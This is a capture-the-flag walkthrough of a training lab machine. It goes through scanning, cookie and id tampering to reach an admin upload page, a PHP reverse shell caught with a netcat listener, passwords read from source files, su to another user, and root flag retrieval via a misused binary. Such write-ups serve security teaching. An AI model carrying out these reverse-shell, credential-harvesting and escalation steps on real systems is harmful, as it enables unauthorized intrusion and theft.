I started with scanning target with nmap.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61e43fd41ee2b2f10d3ced36283667c7 (RSA)
|   256 241da417d4e32a9c905c30588f60778d (ECDSA)
|_  256 78030eb4a1afe5c2f98d29053e29c9f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Target has a http server so I used dirbuster to figure out directories in the server.

2023/03/13 12:07:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/css                  (Status: 301) [Size: 314] [--> http://10.129.240.158/css/]
/fonts                (Status: 301) [Size: 316] [--> http://10.129.240.158/fonts/]
/images               (Status: 301) [Size: 317] [--> http://10.129.240.158/images/]
/index.php            (Status: 200) [Size: 10932]
/js                   (Status: 301) [Size: 313] [--> http://10.129.240.158/js/]
/server-status        (Status: 403) [Size: 279]
/themes               (Status: 301) [Size: 317] [--> http://10.129.240.158/themes/]
/uploads              (Status: 301) [Size: 318] [--> http://10.129.240.158/uploads/]
Progress: 4614 / 4615 (99.98%)
===============================================================
2023/03/13 12:08:33 Finished
===============================================================

There is also admin@megacorp.com as contact in the website



I used burpsuite to gain more information. Found out a login page: /cdn-dgi/login that lets you log as guest with no authentication. Also tried few default usernames and passwords that did not work.
With little change to address: http://10.129.240.158/cdn-cgi/login/admin.php?content=accounts&id=1 found that access ID for admin is :34322 and email: admin@megacorp.com
I changed id and role in browser cookie settings and gained access to upload page.


Setup a netcat listener with command: nc -lvvp 8000 
I uploaded a reverse php shellscript to the server. Then I went to http://10.129.240.158/uploads/php-reverse-shell_oopsie.php to gain reverse shell.

for more functionality I used command: python3 -c 'import pty;pty.spawn("/bin/bash")'




There was robert folder with user.txt file that contained flag: ************

/var/www/html/cdn-cgi/login$ contained: admin.php  db.php  index.php  script.js
of which db.php contained: 
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>

Used: cat * | grep -i passw* to find out username and password in the sourcecode:
if($_POST["username"]==="admin" && $_POST["password"]==="MEGACORP_4dm1n!!")

Used: su robert and password M3g4C0rpUs3r! to gain access to robert user. 
Found with id command that user robert is in group "bugtracker"

cd'd to /usr/bin$ and used opened bugtracker. Then I used command ../root.txt to cat to flag with bugtracker.







